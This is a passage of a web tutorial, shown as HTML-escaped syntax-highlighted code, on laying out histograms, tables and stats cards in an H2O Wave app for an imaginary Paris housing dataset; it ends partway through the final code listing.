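```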
&lt;p&gt;To produce multiple histograms we use the same trick that we used when creating the stats cards by letting the page name vary in &lt;code&gt;show_histogram()&lt;/code&gt;. This means when we create &lt;code&gt;show_histograms()&lt;/code&gt; all we need to do is simply iterate &lt;code&gt;show_histogram()&lt;/code&gt; over different column names with the relevant data and we will produce multiple histograms on our Wave app. We also add another section header into &lt;code&gt;show_histograms()&lt;/code&gt; to give a heading to our histograms.&lt;/p&gt;
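&lt;p&gt;The loop relies on turning a list of integer positions into column names. One way to do this, sketched below with a made-up data frame whose column names are purely illustrative, is to index the pandas &lt;code&gt;Index&lt;/code&gt; held in &lt;code&gt;df.columns&lt;/code&gt; directly, since it accepts a list of positions whereas a plain Python list does not.&lt;/p&gt;

```python
import pandas as pd

# Made-up data frame; the column names are illustrative only
df = pd.DataFrame({'a': [1, 2], 'b': [3, 4], 'c': [5, 6], 'd': [7, 8]})
index = [0, 2]

# A pandas Index accepts a list of positions; a plain list would not
column_names = df.columns[index].tolist()
print(column_names)

# Iterate over the selected columns, as show_histograms() does
for name in column_names:
    values = df[name]
    print(name, values.tolist())
```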
&lt;p&gt;Next we need to update &lt;code&gt;apply_layout()&lt;/code&gt; to define where the plot cards and section card will be placed. We simply need to add two extra zones within our content zone, labelled &lt;code&gt;section2&lt;/code&gt; and &lt;code&gt;bottom&lt;/code&gt;. As with the &lt;code&gt;'top'&lt;/code&gt; zone, we use the &lt;code&gt;direction&lt;/code&gt; argument on the &lt;code&gt;bottom&lt;/code&gt; zone to lay the cards out in a row, i.e. we want to space the cards horizontally.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;meta&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;meta_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;, theme&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;nord&amp;#39;&lt;/span&gt;, layouts&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breakpoint&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;xl&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;1600px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;body&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW, zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;content&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;COLUMN, zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;300px&amp;#39;&lt;/span&gt;, direction &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;bottom&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ])
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Then finally, we add &lt;code&gt;show_histograms()&lt;/code&gt; to &lt;code&gt;server()&lt;/code&gt; so the histograms will appear in the browser.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sever&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_table(q, df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_multiple_stats_cards(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_histograms(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Now, you should see something very similar to the picture below in your browser.&lt;/p&gt;
&lt;p&gt;&lt;img alt="The final version of the Wave app displayed in the browser." height="auto" id="h-rh-i-4" src="https://www.jumpingrivers.com/blog/displaying-data-with-h2o-wave/final_app.png" width="1848"&gt;&lt;/p&gt;
&lt;h2 id="the-final-code"&gt;The final code&lt;/h2&gt;
&lt;p&gt;Finally, here is the full code that we have produced above. Hopefully your code looks very similar!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;h2o_wave&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Q, ui, app, main, data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;numpy&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;np&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pandas&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;as&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;df &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pd&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;read_csv(&lt;span style="color:#a5d6ff"&gt;&amp;#39;ParisHousing.csv&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;values&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;variable_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;@app&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#39;/displayData&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;async&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sever&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; apply_layout(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_homepage(q)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_table(q, df)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_multiple_stats_cards(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;9&lt;/span&gt;,&lt;span style="color:#a5d6ff"&gt;14&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; show_histograms(q, df, index &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;7&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;8&lt;/span&gt;])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;await&lt;/span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;save()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_homepage&lt;/span&gt;(q:Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;header_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;box(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;, width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;100%&amp;#39;&lt;/span&gt;, height&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;86px&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Money&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; icon_color&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Black&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; title&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Paris Housing Market&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; subtitle&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;This is an imaginary housing dataset&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;footer_card(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; caption&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;This dataset was obtained from [Kaggle](https://www.kaggle.com/datasets/mssmartypants/paris-housing-price-prediction)&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;apply_layout&lt;/span&gt;(q: Q):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;meta&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;meta_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;&amp;#39;&lt;/span&gt;, theme&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;nord&amp;#39;&lt;/span&gt;, layouts&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;layout(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; breakpoint&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;xl&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; width&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;1600px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;header&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;body&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW, zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;content&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;COLUMN, zones&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;[
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;top&amp;#39;&lt;/span&gt;, size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;300px&amp;#39;&lt;/span&gt;, direction &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;section2&amp;#39;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;bottom&amp;#39;&lt;/span&gt;, direction&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ZoneDirection&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;ROW),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;zone(&lt;span style="color:#a5d6ff"&gt;&amp;#39;footer&amp;#39;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ])
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;### Making table&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;make_table&lt;/span&gt;(df):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;table&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;250px&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table_column(name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;x, label&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;x) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; x &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;columns&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()],
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; rows &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;table_row(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; str(i), cells &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; list(map(str, df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;values&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;tolist()[i]))) &lt;span style="color:#ff7b72"&gt;for&lt;/span&gt; i &lt;span style="color:#ff7b72;font-weight:bold"&gt;in&lt;/span&gt; df&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;index[&lt;span style="color:#a5d6ff"&gt;0&lt;/span&gt;:&lt;span style="color:#a5d6ff"&gt;100&lt;/span&gt;]]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;def&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;show_table&lt;/span&gt;(q:Q, df):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; q&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;page[&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;] &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; ui&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;section_card(box&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;section1&amp;#39;&lt;/span&gt;,
